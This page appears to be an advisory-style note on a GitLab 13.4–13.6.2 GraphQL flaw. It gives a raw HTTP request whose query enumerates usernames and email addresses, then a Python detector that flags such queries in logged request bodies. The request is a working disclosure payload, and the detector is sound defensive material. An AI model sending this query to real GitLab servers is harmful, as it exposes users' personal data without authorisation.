GitLab 13.4 – 13.6.2
    GitLab exposes a GraphQL endpoint; sending it a crafted query leaks user email addresses and usernames.

    POST /api/graphql HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    Content-Length: 212
    Cookie: xxxxxxxxxxxxxxxx
    Content-Type: application/json

    {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
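For detection, the check below walks the selection set of a logged GraphQL request body and flags any query that asks for `email` beneath the root `users` field, which is the shape of the request above. It is an added example, not GitLab code; the function names and the benign sample body are constructed for illustration, and it assumes request bodies are captured somewhere you can read them (for example at a reverse proxy or WAF).

```python
import json
import re

# GraphQL tokens that matter for nesting: strings, names, braces, parentheses.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_][A-Za-z0-9_]*|[{}()]')

def selected_paths(query):
    """Return the dotted field paths a query selects, e.g. users.edges.node.email."""
    paths, stack, last, in_args = set(), [], None, 0
    for tok in TOKEN.findall(query):
        if tok == "(":
            in_args += 1
        elif tok == ")":
            in_args -= 1
        elif in_args or tok.startswith('"'):
            continue                    # argument names/values are not fields
        elif tok == "{":
            stack.append(last)          # open the selection set of the last field
            last = None
        elif tok == "}":
            if stack:
                stack.pop()
            last = None
        elif stack:                     # a name inside a selection set
            last = tok
            paths.add(".".join([s for s in stack if s] + [tok]))
    return paths

def flags_user_email_enumeration(body):
    """True if a JSON GraphQL request body selects `email` beneath `users`."""
    try:
        query = json.loads(body).get("query")
    except (ValueError, AttributeError):
        return False                    # not JSON, or a batched (list) body
    if not isinstance(query, str):
        return False
    return any(p.startswith("users.") and p.endswith(".email")
               for p in selected_paths(query))

# Request body as shown on this page.
PAGE_BODY = r'{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}'
# Constructed sample: lists users without asking for email.
BENIGN_BODY = '{"query":"{ users { nodes { username } } }"}'

if __name__ == "__main__":
    for name, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(name, flags_user_email_enumeration(body))
```

Named fragment spreads are not resolved by this walker, so a query that moves `email` into a separate `fragment` definition needs a full GraphQL parser to catch.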
